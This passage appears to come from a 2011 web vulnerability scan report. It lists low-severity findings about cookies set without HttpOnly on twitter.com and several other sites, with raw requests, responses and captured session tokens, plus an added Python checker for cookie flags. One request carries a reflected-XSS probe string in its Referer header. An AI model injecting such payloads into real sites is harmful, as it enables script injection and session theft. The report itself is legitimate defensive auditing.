The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webandy/status/30434889127960577 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224919-88479-17443
ETag: "57ec15d6db2e642f3190ad41e31c8dd6"
Last-Modified: Fri, 28 Jan 2011 14:28:40 GMT
X-Runtime: 0.03905
Content-Type: text/html; charset=utf-8
Content-Length: 13641
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjhodHRwOi8vdHdpdHRlci5jb20vd2ViYW5keS9z%250AdGF0dXMvMzA0MzQ4ODkxMjc5NjA1Nzc6DGNzcmZfaWQiJTI5OWQ2NTRkM2U2%250AN2EyOGYyMDE5ZGJhNjA0YjRhZmM2OgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE%253D--84b9c2aee944901e5bd61754af202b278a459d82; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.184. http://twitter.com/widgets

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /widgets

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /widgets HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 301 Moved Permanently
Date: Fri, 28 Jan 2011 17:13:10 GMT
Server: hi
Status: 301 Moved Permanently
X-Transaction: 1296234790-96747-3920
Last-Modified: Fri, 28 Jan 2011 17:13:10 GMT
Location: http://twitter.com/about/resources/widgets
X-Runtime: 0.00778
Content-Type: text/html; charset=utf-8
Content-Length: 108
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<html><body>You are being <a href="http://twitter.com/about/resources/widgets">redirected</a>.</body></html>

11.185. http://twitter.com/zonajones

Summary

Severity:   Low
Confidence:   Firm
Host:   http://twitter.com
Path:   /zonajones

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /zonajones HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:57 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265977-81164-11891
ETag: "18ef6945dbad6fc926ced7c8559a729e"
Last-Modified: Sat, 29 Jan 2011 01:52:57 GMT
X-Runtime: 0.01559
Content-Type: text/html; charset=utf-8
Content-Length: 47763
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...

11.186. http://www.berkshireeagle.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.berkshireeagle.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.berkshireeagle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Vary: Accept-encoding
Expires: Sat, 29 Jan 2011 02:03:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 29 Jan 2011 02:03:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=RTFIABV0BZYUKCUUCAWCFEY; path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 106428

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Home'><meta name="keywords" content="Berkshire Eagle headlines"/><title>Home - Berkshire Ea
...[SNIP]...

11.187. http://www.collegeanduniversity.net/herald/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.collegeanduniversity.net
Path:   /herald/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /herald/ HTTP/1.1
Host: www.collegeanduniversity.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:30:22 GMT
Server: Apache
Set-Cookie: CFID=23963338;expires=Mon, 21-Jan-2041 04:30:22 GMT;path=/
Set-Cookie: CFTOKEN=f88699cd696e59f-D0093CEE-19B9-F336-D82E00A07F24E43B;expires=Mon, 21-Jan-2041 04:30:22 GMT;path=/
Set-Cookie: JSESSIONID=2230a73fafc47a1826775e4a1668b3f46594;path=/
Set-Cookie: CUNET.SHOWDEBUG=0;path=/
Set-Cookie: CU2005FRONTAPPKEY.SHOWDEBUG=0;path=/
Set-Cookie: CID=175;expires=Mon, 21-Jan-2041 04:30:22 GMT;path=/
P3P: CP='ADMa DEVa OUR IND DSP NON COR'
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28386

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Find Online College Degrees - Top Online Universities at Collegeanduniversity.net</title>
<meta name="Descriptio
...[SNIP]...

11.188. http://www.dominionenterprises.com/main/do/Privacy_Policy

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dominionenterprises.com
Path:   /main/do/Privacy_Policy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /main/do/Privacy_Policy HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 18:05:52 GMT
Server: Apache/2.0.59 (Unix) DAV/2 PHP/4.4.2
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=7d3a89d5f21954b4e37104192891668e; expires=Sun, 30 Jan 2011 18:05:52 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 18:05:52 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Connection: close
Content-Type: text/html
Content-Length: 33701

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Privacy Policy</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-
...[SNIP]...

11.189. http://www.dominionenterprises.com/main/do/Terms_of_Use

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dominionenterprises.com
Path:   /main/do/Terms_of_Use

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /main/do/Terms_of_Use HTTP/1.1
Host: www.dominionenterprises.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 18:05:52 GMT
X-Powered-By: PHP/4.4.2
Set-Cookie: PHPSESSID=f55dc9f4da1f9269275d3d70f7d2e82a; expires=Sun, 30 Jan 2011 18:05:52 GMT; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 18:05:52 GMT
Cache-Control: no-store, must-revalidate
Cache-Control: post-check=-1, pre-check=-1
Connection: close
Content-Type: text/html
Set-Cookie: TSa27990=939a3b6a072740b6e33cc3abedde002f435053cfeb6a1fbb4d42fbb39c5eca85e318bc02; Path=/
Content-Length: 45884

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html>
<head>
<title>Dominion Enterprises | Terms of Use</title>
       <base href="http://www.dominionenterprises.com/" />
   <meta http-eq
...[SNIP]...

11.190. http://www.paperg.com/jsfb/embed.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jsfb/embed.php?pid=3922&bid=2123 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 15:00:05 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 39271


var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL2123 = 'http://www.
...[SNIP]...

11.191. http://www.parker-software.com/forum/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.parker-software.com
Path:   /forum/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forum/ HTTP/1.1
Host: www.parker-software.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:58:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 21920
Content-Type: text/html
Expires: Wed, 26 Jan 2011 13:58:10 GMT
Set-Cookie: WWF9lVisit=LV=2011%2D01%2D28+13%3A58%3A10; expires=Sat, 28-Jan-2012 13:58:10 GMT; path=/forum/
Set-Cookie: WWF9sID=SID=629255141c2dfczb44f2d1ea4be92fz9; path=/forum/
Set-Cookie: ASPSESSIONIDCQSCRASQ=CIEMDCNAFMCFHFEFAKMMMFLF; path=/
Cache-control: No-Store


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<m
...[SNIP]...

11.192. http://www.screenthumbs.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.screenthumbs.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.screenthumbs.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 21:52:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=03c0e7391c4e0c2e4a05965642293dcb; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a; path=/
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
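
The finding repeated in 11.179 through 11.192 is one check applied to each response: a Set-Cookie header without the HttpOnly attribute, graded up when the cookie's name or value looks like a session identifier. What follows is an added example of that check, written for this report; it is not scanner code and not code from any of the sites listed. It parses the header block of a raw response, skips cookies the server is clearing (an empty value with a past Expires, as with twitter.com's auth_token), also requires Secure when the response was fetched over HTTPS, and counts how many times one name is set in a single response so that the doubled PHPSESSID in 11.192 stands out. The session-name pattern and the two trimmed sample responses are constructed for the example.

```python
"""Flag cookies set without HttpOnly (and Secure over HTTPS), scanner-style.

Added example for this report, not scanner or site code. The name pattern is an
assumption drawn from the cookie names seen above, and both sample responses are
constructed, trimmed copies of the twitter.com and screenthumbs.com responses.
"""
import re
from typing import NamedTuple

# Assumption: names that usually carry a session identifier. Illustrative only.
SESSION_NAME_RE = re.compile(r"sess|sid\b|token|auth|cfid", re.I)


class CookieFinding(NamedTuple):
    name: str
    missing_flags: tuple   # subset of ("HttpOnly", "Secure")
    session_like: bool     # name/value heuristics say this is probably a session token
    set_count: int         # how many Set-Cookie headers in the response named this cookie


def parse_set_cookie(header_value: str):
    """Split one Set-Cookie value into (name, value, {attribute_lowercase: value})."""
    first, *rest = [p.strip() for p in header_value.split(";")]
    name, _, value = first.partition("=")
    attrs = {}
    for item in rest:
        if item:
            key, _, val = item.partition("=")
            attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def looks_like_session_token(name: str, value: str) -> bool:
    """Cheap stand-in for the scanner's 'appears to contain a session token'."""
    if SESSION_NAME_RE.search(name):
        return True
    # A long opaque value with no visible structure is suspicious regardless of name.
    return len(value) >= 20 and re.fullmatch(r"[A-Za-z0-9%+/=._-]+", value) is not None


def audit_response(raw_response: str, https: bool = False):
    """Return a CookieFinding for every cookie set without HttpOnly (or Secure over HTTPS)."""
    head = re.split(r"\r?\n\r?\n", raw_response, maxsplit=1)[0]   # headers only
    cookies = []
    for line in head.splitlines():
        field, sep, rest = line.partition(":")
        if sep and field.strip().lower() == "set-cookie":
            cookies.append(parse_set_cookie(rest))

    counts = {}
    for name, _, _ in cookies:
        counts[name] = counts.get(name, 0) + 1

    findings = []
    for name, value, attrs in cookies:
        # Empty value plus an Expires attribute is the server deleting the cookie:
        # nothing to steal, so it is not reported.
        if value == "" and "expires" in attrs:
            continue
        missing = []
        if "httponly" not in attrs:
            missing.append("HttpOnly")
        if https and "secure" not in attrs:
            missing.append("Secure")
        if missing:
            findings.append(CookieFinding(name, tuple(missing),
                                          looks_like_session_token(name, value),
                                          counts[name]))
    return findings


# Constructed samples, trimmed from the twitter.com and screenthumbs.com responses above.
TWITTER_RESPONSE = (
    "HTTP/1.0 200 OK\r\n"
    "Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT\r\n"
    "Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgx--576140db2faf89053449b7; "
    "domain=.twitter.com; path=/\r\n"
    "X-Frame-Options: SAMEORIGIN\r\n"
    "\r\n"
    "<html>...</html>"
)
SCREENTHUMBS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: PHPSESSID=03c0e7391c4e0c2e4a05965642293dcb; path=/\r\n"
    "Pragma: no-cache\r\n"
    "Set-Cookie: PHPSESSID=8d1f4024cc5dca3b5593bdfe452d2c4a; path=/\r\n"
    "\r\n"
    "<html>...</html>"
)

if __name__ == "__main__":
    for label, raw in (("twitter.com", TWITTER_RESPONSE), ("screenthumbs.com", SCREENTHUMBS_RESPONSE)):
        for f in audit_response(raw):
            print(label, f)
```

HttpOnly only keeps same-origin script from reading the cookie; it does nothing against CSRF, session fixation, or a cookie sent in clear text over HTTP, so a cookie that passes this check still needs Secure (and, in current browsers, SameSite) and a value that is regenerated at login. A cookie set twice in one response, as in 11.192, means the second value replaces the first in the browser; it usually points to a session being started twice in the same request and is worth confirming by hand.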

11.193. http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366 HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ANON_ID=...[SNIP]...;

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 201
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=aBnEV8qZbaO5AiPqlfEMlMp0CrY1VMO6DaxPZc430eDivvFS7bYquWjKWsEyoRZbWhm4HfJyiRUg8218umR6KSGZbrssC9JqkYBZdGOqnZcdQ0bEH1RhMnrgAKNi7tStd4DLn17NIOFpIlovT7JKoB6FfMbXjOum0y8htmV9BK4rXGvOOt2gohZaOZb1BUoF8U0MBLq85Ys9LJ8paIxGC1Y6O1y3XVZaaBJRO5a4kg8GZc4q60WBbrdEt8DAgNgdcdSchZbyWE6xZckgGgNZcZaAG3jZcGxQ6Oi8s5UHYM9f5OhZcRcGqanCGSmdp8oFwF3msZcng9YBbvZbVJXeTheW3fZb7nKtOqZb91SWJNBSOLUN7MOOHGISOhYq0wZcIKNxydoZdor6WIaGIGWQXSDVxPQgp1lDHSQq29ly7CiTxU58Zd7TGTGCVjWrb39CkZaZaVZc4E9PS8BrVtmxq4vcSFl4KbDCmeveWiPMQExZdCAuhsidGAcbnQZcvwy6HdTRUWHSNWVTPPlZcWd5PpJM3gvYsbM2K2vRXobaAZbZarGcVaH4BRuQgRf2ZcsiMpaI7VFcFLFo7wCXqNZdTroL5ZdvbW; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:38:32 GMT;
Content-Type: text/html
Location: http:/b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/874556783/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366
Content-Length: 36
Connection: Close

<h1>Error 302 Moved Temporarily</h1>

11.194. http://a.tribalfusion.com/h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /h.click/a7mNvB0GM0YcJY1cZbpnqvW2UQVWbMAUAQYQav0ScUrQtbx1dvqWP3N2GY50UYZcVATv4PZb8PmbE2dYn1dnLpdTM36MY5V3aVcQjWcF7SAFOWtY3Ubb45bEqWEUoVaJdQaZbZcRGJZbQU6vPWM8WcU25rmsndeO0tqIwxZbMVw/ HTTP/1.1
Host: a.tribalfusion.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
